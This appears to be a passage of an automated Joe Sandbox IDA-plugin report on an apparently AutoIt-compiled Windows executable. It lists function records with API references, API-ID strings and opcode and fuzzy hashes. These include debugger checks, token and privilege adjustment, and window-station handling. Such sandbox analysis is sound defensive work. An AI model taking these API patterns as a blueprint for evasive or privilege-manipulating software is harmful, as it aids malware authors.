                                                                          • Instruction Fuzzy Hash: B201DB21B6EB4188EE157F15600906EA661EF84FE0BC90230EE5E037E5EE3CE4428650
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 00007FF7ADC03756
                                                                            • Part of subcall function 00007FF7ADC29334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC29348
                                                                            • Part of subcall function 00007FF7ADC036E8: SystemParametersInfoW.USER32 ref: 00007FF7ADC03705
                                                                            • Part of subcall function 00007FF7ADC036E8: SystemParametersInfoW.USER32 ref: 00007FF7ADC03725
                                                                            • Part of subcall function 00007FF7ADC037B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC037F2
                                                                            • Part of subcall function 00007FF7ADC037B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03807
                                                                            • Part of subcall function 00007FF7ADC037B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC0388D
                                                                            • Part of subcall function 00007FF7ADC037B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03924
                                                                          • SystemParametersInfoW.USER32 ref: 00007FF7ADC03797
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 4207566314-0
                                                                          • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                          • Instruction ID: 608bf828c24fae34bcd8bc22386a8b7b85f919713a80a99525b765ea355d647a
                                                                          • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                          • Instruction Fuzzy Hash: 57014F71D0E3429EF714BB65A8612F5F661EF48700FC60035D40C862B2FE2CB8869B20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 485612231-0
                                                                          • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                          • Instruction ID: af856aa9b87d9ce2b1cd8a92bab5bad39c7977f5f1355699d7cbd59a0cd1d40c
                                                                          • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                          • Instruction Fuzzy Hash: 96E04F50E2F2078AFF0D7BB29809078D692DF48740BC54030C80D46272FD6CE5474620
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast
                                                                          • String ID:
                                                                          • API String ID: 918212764-0
                                                                          • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                          • Instruction ID: f5733a35d518555db2f761be048bb35466f9ba000cde44eacda3216af00a47a5
                                                                          • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                          • Instruction Fuzzy Hash: 5B110A91F4E24649FEA47760A48C37CD282CF84760FC61234D91E062F2FDACE8439321
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID:
                                                                          • API String ID: 1385522511-0
                                                                          • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                          • Instruction ID: ab67c28db06aa190b265080aa9eff418344b5b2109a71dc104a900efbe9b5219
                                                                          • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                          • Instruction Fuzzy Hash: A7329F22A0E69289EB60EB15D4543B9E761FB84B84FC68131EA4D477B5FF3DE4438720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                          • Instruction ID: 43a3a22c9600e6df2dc8d2244eb10c08cc394e40b4b4e2c49e6f8d7cd0761624
                                                                          • Opcode Fuzzy Hash: d5cf1192761794fe4b954deb7468c2d4d1c2f7b36110f07c0798e677f51d25b9
                                                                          • Instruction Fuzzy Hash: 53415A22B0EA418AEB10EF65D0403ACA3A0FB54B88FC64535DE0D177A5EF7CE456C361
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                          • String ID:
                                                                          • API String ID: 3947729631-0
                                                                          • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                          • Instruction ID: d15e7e6782559493a9a3084d7b27dd6f8afb6c6604af7d8a74454721e378a234
                                                                          • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                          • Instruction Fuzzy Hash: 1141C161E4E6568AFB68BB15D450278E271EF88B40FC64039DA0E472F1FE3DE9439360
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                          • Instruction ID: 7cdb9eb36803a760c93b9d6af1482208053baf8efd59637ecf807351e0b7f333
                                                                          • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                          • Instruction Fuzzy Hash: 9821387260D6428BD765AF24E4483B9B6A1EB80B50FD54234DA6D872E9EF3CC802C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                          • Instruction ID: 7ab2a9eafad88363b869ad977de8ee3224ef7507f13970ace4c819b196b407e7
                                                                          • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                          • Instruction Fuzzy Hash: 5F21AD21A1E6828AFA54BF11940017DD2A1FF45B84FD54130EE4C97BA6FFBCE8429761
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                          • Instruction ID: ed1fb48384bdb257a71bce9f88564472cc726616771587c526296b500892488b
                                                                          • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                          • Instruction Fuzzy Hash: C8112826B2EA4589EB44AF16D0907BCA360EB88F91FD55132DE1E073B5DF7CD4928710
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                          • Instruction ID: 6d88356a92b86dd8481bda94603b66dbb5ee7b2ca6b40c055d6ddcd931681cba
                                                                          • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                          • Instruction Fuzzy Hash: DC1198B291E74699D614BF50D4082ADF762EF84351FD14132D64D066F5EFBCE002DB20
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                          • Instruction ID: 0ff43fd2a1657bfbe869dabb5c4f41ccb9d3a2b7e7c05ac4be54906424774f61
                                                                          • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                          • Instruction Fuzzy Hash: 2F017121A0E20749FD1CBA659415378D151DF85764FE61630E92D462F3EDACE4035220
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                          • Instruction ID: acebbc9163d3d8d1537500b6f88907ec1319eadc7d58cb751c1e4b8169f52494
                                                                          • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                          • Instruction Fuzzy Hash: 1AF0B421A1E3038EE91CB765A44127DE284DF44750FE61130F95E862F7FEACE4438671
                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC34970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC34999
                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7ADC4C8FE), ref: 00007FF7ADC0656F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3938577545-0
                                                                          • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                          • Instruction ID: b55c8bc4162875b1eaa2d0baef95f0301662209d438e744a98fed1079a94d07d
                                                                          • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                          • Instruction Fuzzy Hash: C2F05E52A0EA058BFF19EF75D0653386360FB58F0CFD60530DA2E0A299EF6CD4558361
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ADC24C5C
                                                                            • Part of subcall function 00007FF7ADC25600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ADC25609
                                                                            • Part of subcall function 00007FF7ADC25600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7ADC2561A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                          • String ID:
                                                                          • API String ID: 1680350287-0
                                                                          • Opcode ID: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                          • Instruction ID: 1df6da365ec86ef8c3a785907cf6a2a8f951353526ed75c30df9983fc4921b8e
                                                                          • Opcode Fuzzy Hash: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                                          • Instruction Fuzzy Hash: 71E0B640E1F1074EFD68B7A955450BA91408F68770EDA1B30D93D492E6BD5CA4534130
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                          • Instruction ID: dcbe2ff7007b2d18d7ffc79181958655599d60f1b87db15f43089702834a1c41
                                                                          • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                          • Instruction Fuzzy Hash: 15E03922A18A9183D720DF06F44435AE370FB89BD8F944525EF8C47B2ACF7DC5528B80
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Similarity
                                                                          • API ID: LongNamePath
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: Open_onexit
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: Process$CurrentVersionWow64_onexit
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: _onexit
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: _onexit
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          Similarity
                                                                          • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                          • String ID:
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          Similarity
                                                                          • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                          • String ID: P
                                                                          Similarity
                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 3778422247-2988720461
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                          • String ID: default$winsta0$winsta0\default
                                                                          • API String ID: 3202303201-1423368268
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                          • String ID: AutoIt v3 GUI
                                                                          • API String ID: 1458621304-248962490
                                                                          APIs
                                                                          Memory Dump Source
